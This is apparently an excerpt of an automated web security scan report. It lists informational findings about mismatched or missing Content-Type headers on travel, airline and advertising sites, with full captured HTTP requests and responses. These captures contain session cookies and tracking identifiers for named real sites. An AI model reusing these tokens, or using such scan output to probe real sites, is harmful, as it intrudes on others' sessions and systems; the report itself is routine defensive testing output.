User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7578a4s2f2v2eeuc05nnpk0f35; __utma=1.152168344.1317600463.1317600463.1317600463.1; __utmb=1.1.10.1317600463; __utmc=1; __utmz=1.1317600463.1.1.utmcsr=sabre.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:50 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 16 Mar 2010 21:58:47 GMT
ETag: "27ce54-37e-1a1cb3c0"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ........................................................................................99......................nn.......................................................
...[SNIP]...
28.111. http://www.sabrehospitality.com/images/masthead/int-masthead-distribution.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sabrehospitality.com
Path:   /images/masthead/int-masthead-distribution.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /images/masthead/int-masthead-distribution.jpg HTTP/1.1
Host: www.sabrehospitality.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabrehospitality.com/hotel-distribution-systems.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7578a4s2f2v2eeuc05nnpk0f35; __utma=1.152168344.1317600463.1317600463.1317600463.1; __utmb=1.1.10.1317600463; __utmc=1; __utmz=1.1317600463.1.1.utmcsr=sabre.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:09 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 31 Mar 2010 19:23:09 GMT
ETag: "27ce9a-104689-ad24c140"
Accept-Ranges: bytes
Content-Length: 1066633
Connection: close
Content-Type: image/jpeg
X-Pad: avoid browser bug

.PNG
.
...IHDR...............$n....tEXtSoftware.Adobe ImageReadyq.e<..F+IDATx.....%9.$........O#g......p.
(.9`.3.p.....H..TgF....SUM..._.-}...7......%.um|.A..).h$.~;...{...........+g...#............
...[SNIP]...
28.112. http://www.sabretravelnetwork.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; exp_last_activity=1317618416; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:58 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 30 Apr 2009 18:23:44 GMT
ETag: "ec8bfd-57e-cbd08c00"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...
28.113. http://www.tnetnoc.com/siteImages/ORB/banners/hotel/details/telesales/ORB_Telesales_HotelDetails-2.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tnetnoc.com
Path:   /siteImages/ORB/banners/hotel/details/telesales/ORB_Telesales_HotelDetails-2.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /siteImages/ORB/banners/hotel/details/telesales/ORB_Telesales_HotelDetails-2.png HTTP/1.1
Host: www.tnetnoc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=10417&hotel.hkey=10417_null_null_null_A1:0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 01 Sep 2011 20:26:52 GMT
ETag: "e78-4abe710b1eaa1"
Accept-Ranges: bytes
Content-Length: 3704
Content-Type: image/png
Date: Mon, 03 Oct 2011 00:27:18 GMT
Connection: close

......JFIF.............C...............
.

       
...............%...#... , #&')*)..-0-(0%()(...C....
.
.

.(...((((((((((((((((((((((((((((((((((((((((((((((((((......<...."..............................
...[SNIP]...
28.114. http://www.tripadvisor.com/HotelCheckRates  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /HotelCheckRates

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

POST /HotelCheckRates?Action=AddBoomerangTag HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
Content-Length: 55
Origin: http://www.tripadvisor.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; ServerPool=T; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3Brev03b%3A8754%3Bbak02b%3A5465%3Bmed02b%3A8739%3B; CM=%1%sh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; TAReturnTo=%1%%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.3*MC.11893*LS.SmartDeals*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.2*TRA.true*LL.971922*LD.60745*EWS.SmartDeals; TACds=C.2.11007.0.2011-10-02

checkIn=10%2F14%2F2011&checkOut=10%2F16%2F2011&adults=2

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:05 GMT
Server: Apache
pragma: no-cache
cache-control: no-cache,no-store,must-revalidate
expires: 0
Set-Cookie: TATravelInfo=V2*AY.2011*AM.10*AD.14*DY.2011*DM.10*DD.16*A.2*MG.-1*HP.2*FL.3; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 01:02:05 GMT; Path=/
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.7*MC.11893*LS.HotelCheckRates*PD-2147.1*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.25*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*CU.USD*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.6*TRA.true*LL.4139281*LD.258705*EWS.CheckMore; Domain=.tripadvisor.com; Path=/
Set-Cookie: ServerPool=T; Domain=.tripadvisor.com; Path=/
Set-Cookie: PassThruUrlArgs=null; Domain=.tripadvisor.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 19
Connection: close
Content-Type: text/html;charset=UTF-8

<!--check rates-->
28.115. http://www.tripadvisor.com/api/ratinginfo/1.0/getRating  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /api/ratinginfo/1.0/getRating

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /api/ratinginfo/1.0/getRating?key=4cd5d1bc-7d71-4eea-afde-d52f9a1a247c&lang=en&locationId=4215&callback=YAHOO.cx.exp.widget.infosite.TripAdvisor.processTripAdvisorJasonResponse HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:18 GMT
Server: Apache
Content-Length: 371
Connection: close
Content-Type: text/plain; charset=utf-8

YAHOO.cx.exp.widget.infosite.TripAdvisor.processTripAdvisorJasonResponse({
"hotelDetailUrl": "http://www.tripadvisor.com/Hotel_Review-g60745-d111418-Reviews-m13878-The_Boston_Park_Plaza_Hotel_Towers
...[SNIP]...
28.116. http://www.turkishairlines.com/data/gateway.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.turkishairlines.com
Path:   /data/gateway.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /data/gateway.aspx?country=197 HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, */*; q=0.01
Referer: http://www.turkishairlines.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.1.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:01:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 198

<li><span class="ui-icons ui-icons-ggw-cities"></span><a href="/en-CA/index.aspx">English</a></li><li><span class="ui-icons ui-icons-ggw-cities"></span><a href="/fr-CA/index.aspx">Fran..ais</a></li>
28.117. http://www.turkishairlines.com/data/promotion.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.turkishairlines.com
Path:   /data/promotion.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

POST /data/promotion.aspx HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
Content-Length: 44
Origin: http://www.turkishairlines.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.turkishairlines.com/en-CA/index.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.2.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

lang=en-CA&siteid=80&p=carousel&mod=carousel

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 5700

[ {"PROMOSYON_ID":"AMS2B27FEIST","SITE_ID":"11","SIRA":"1","KALKISKOD":"AMS","VARISKOD":"IST","DOMESTIC":"False","namekalkis":"Amsterdam","name":"Istanbul","KALKIS":"Schiphol Havaliman..","VARIS":"Ata
...[SNIP]...
28.118. http://www.turkishairlines.com/en-CA/quicksearch.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.turkishairlines.com
Path:   /en-CA/quicksearch.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain unrecognised content.

Request

GET /en-CA/quicksearch.aspx HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.turkishairlines.com/en-CA/index.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.1.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: application/json; charset=utf-8
Content-Length: 66718

arrayAirports={arrayAirports: [{display: "Abu Dhabi Airport",lookup1: "ABU DHAB.. A..RPORT",airport_code: "AUH",city_code: "AUH",country_name: "UNITED ARAB EMIRATES",city_name: "Abu Dhabi",tags: "Abu
...[SNIP]...
28.119. http://www9.effectivemeasure.net/v4/em_js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www9.effectivemeasure.net
Path:   /v4/em_js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /v4/em_js?flag=0&v=&vt=&hl=&sv=0&pv=&pn=&p=aHR0cDovL3d3dy5nb2FsLmNvbS9lbi90ZWFtcy9lbmdsYW5kLzk3L21hbi11dGQtbmV3cw%3D%3D&r=&f=1&ns=_em&rnd=0.11160158668644726&u=&sf=1& HTTP/1.1
Host: www9.effectivemeasure.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/teams/england/97/man-utd-news
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hl=1; vt=ad466b7502917b9a0779b9e202024e62e18088e413-981323754e62e3b1

Response

HTTP/1.1 200 OK
P3P: policyref="http://www.effectivemeasure.net/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Pragma: no-cache
Cache-Control: no-cache
Cache-Control: no-cache, must-revalidate
Pragma-directive: no-cache
Cache-Directive: no-cache
Expires: 0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: hl=1; expires=Tue, 01-Nov-2011 23:52:45 GMT; path=/; domain=.effectivemeasure.net
Set-Cookie: vt=92ca95cf72da02be93a9b9e202024e62e18088e413-981323754e88f94d; expires=Wed, 26-Sep-2012 23:52:45 GMT; path=/; domain=.effectivemeasure.net
Set-Cookie: v=452d73c7cba4bbda22aaf13bd6fa4e88f8d57af834-210214684e88f94d338_5280; expires=Mon, 03-Oct-2011 00:22:45 GMT; path=/; domain=.effectivemeasure.net
Content-type: text/javascript
Connection: close
Content-Length: 186
Date: Sun, 02 Oct 2011 23:52:45 GMT
Server: C20

_em._domain="goal.com";_em.setCkHl();_em.setCkVt("92ca95cf72da02be93a9b9e202024e62e18088e413-981323754e88f94d");_em.setCkV("452d73c7cba4bbda22aaf13bd6fa4e88f8d57af834-210214684e88f94d");
29. Content type is not specified  previous  next
There are 39 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

29.1. http://ad.technoratimedia.com/st  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.technoratimedia.com
Path:   /st

Request

GET /st?pfm=1&tlfs=ch&tmen=ch&tphv=ch&rtg=ga&brw=cr3&os=wn7&prm=0&efo=0&atf=1&uatRandNo=65268&ad_type=ad&section=1782250&ad_size=300x250 HTTP/1.1
Host: ad.technoratimedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:52:56 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:52:56 GMT
Pragma: no-cache
Content-Length: 4383
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passb
...[SNIP]...
29.2. http://ad.yieldmanager.com/st  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Request

GET /st?ad_type=ad&ad_size=468x60&section=2398370 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:48:54 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:48:54 GMT
Pragma: no-cache
Content-Length: 4292
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passb
...[SNIP]...
29.3. http://orbitz.tt.omtrdc.net/m2/orbitz/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://orbitz.tt.omtrdc.net
Path:   /m2/orbitz/mbox/standard

Request

GET /m2/orbitz/mbox/standard?mboxHost=www.orbitz.com&mboxSession=1317600406536-142286&mboxPage=1317600562009-125559&screenHeight=1200&screenWidth=1920&browserWidth=700&browserHeight=700&browserTimeOffset=-300&colorDepth=16&mboxCount=2&numberOfNights=3&numberOfRooms=1&hotelSRNavigationSegment=1&mbox=hotel200&mboxId=0&mboxTime=1317582605700&mboxURL=http%3A%2F%2Fwww.orbitz.com%2Fshop%2Fhotelsearch%3Ftype%3Dhotel%26hotel.keyword.key%3DBoston%252CUnited%2520States%26hotel.rooms%5B0%5D.adlts%3D1%26hotel.type%3Dkeyword%26hotel.chkin%3D10%2F04%2F11%26hotel.chkout%3D10%2F07%2F11%26search%3DSearch%26WT.mc_ev%3Dclick%26WT.mc_id%3Do_igo_merch_city_dated%26gcid%3DC11287x600-CYBoston%2CUnited%2520States%26lpid%3Dplhot&mboxVersion=39 HTTP/1.1
Host: orbitz.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Length: 89
Date: Mon, 03 Oct 2011 00:10:08 GMT
Server: Test & Target

mboxFactories.get('default').get('hotel200',0).setOffer(new mboxOfferDefault()).loaded();
29.4. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/sc/standard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://orbitzaway.tt.omtrdc.net
Path:   /m2/orbitzaway/sc/standard

Request

GET /m2/orbitzaway/sc/standard?mboxHost=www.trip.com&mboxSession=1317602099178-690078&mboxPage=1317602099178-690078&mboxCount=3&mbox=SiteCatalyst%3A%20event&mboxId=0&mboxTime=1317584104035&visitorNamespace=orbitzaway&pageName=Flights&currencyCode=USD&channel=Compare_Rates&server=trip.com&campaign=1&events=event2&resolution=1920x1200&colorDepth=16&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&browserWidth=0&browserHeight=0&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cpdf%2Cdoc%2Cdocx%2Cxls%2Cxlsx%2Cppt%2Cpptx&linkInternalFilters=javascript%3A%2Ctrip.com&linkTrackVars=None&linkTrackEvents=None&prop8=Data%20Not%20Available&eVar8=Data%20Not%20Available&prop9=Data%20Not%20Available&eVar9=Data%20Not%20Available&prop10=Data%20Not%20Available&eVar10=Data%20Not%20Available&eVar11=Flights&eVar12=Compare_Rates&mboxURL=http%3A%2F%2Fwww.trip.com%2F%3Ftype%3Dair%26utm_source%3Dorbitz%26utm_medium%3Dcrpopunder%26utm_content%3Dair%26utm_campaign%3Dtriplooking%26cmpid%3D1&mboxReferrer=&mboxVersion=38&scPluginVersion=1 HTTP/1.1
Host: orbitzaway.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Length: 220
Date: Mon, 03 Oct 2011 00:35:07 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1317602099178-690078.19");mboxFactories.get('default').get('SiteCatalyst: event', 0).setOffer(new mboxOfferD
...[SNIP]...
29.5. http://pcm1.map.pulsemgr.com/uds/pc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pcm1.map.pulsemgr.com
Path:   /uds/pc

Request

GET /uds/pc?ptnr=21272&sig=7f55db33fbb1aeb3132ef7151d50c9d9 HTTP/1.1
Host: pcm1.map.pulsemgr.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://bh.contextweb.com/bh/visitormatch?tag=106934&pid=538936
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=OPTOUT; c=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 43
Date: Sun, 02 Oct 2011 23:50:13 GMT
Connection: close

GIF89a.............!.......,...........D..;
29.6. http://www.aon.com/manchesterunited/fougrdbd-webfont.ttf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aon.com
Path:   /manchesterunited/fougrdbd-webfont.ttf

Request

GET /manchesterunited/fougrdbd-webfont.ttf HTTP/1.1
Host: www.aon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.aon.com/manchesterunited/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FDA5F4B4BB1AB049D12027B006BB7DA5; s_pers=%20gpv_pageName%3D/manchesterunited/%7C1317601722252%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"56888-1314119277000"
Last-Modified: Tue, 23 Aug 2011 17:07:57 GMT
Content-Length: 56888
Date: Sun, 02 Oct 2011 23:59:11 GMT

........... FFTMSQP`........GDEF.L.........\GPOS.......h....GSUB.5xO...0...6OS/2..k........`cmap..A.........cvt ......
....<fpgm../....d...egasp............glyf...q.......@head.......,...6hhea...q...d
...[SNIP]...
29.7. http://www.aon.com/manchesterunited/vagroundedstd-light-webfont.ttf  previous  next

Summary

Severity:   Information
Confidence:   Certain
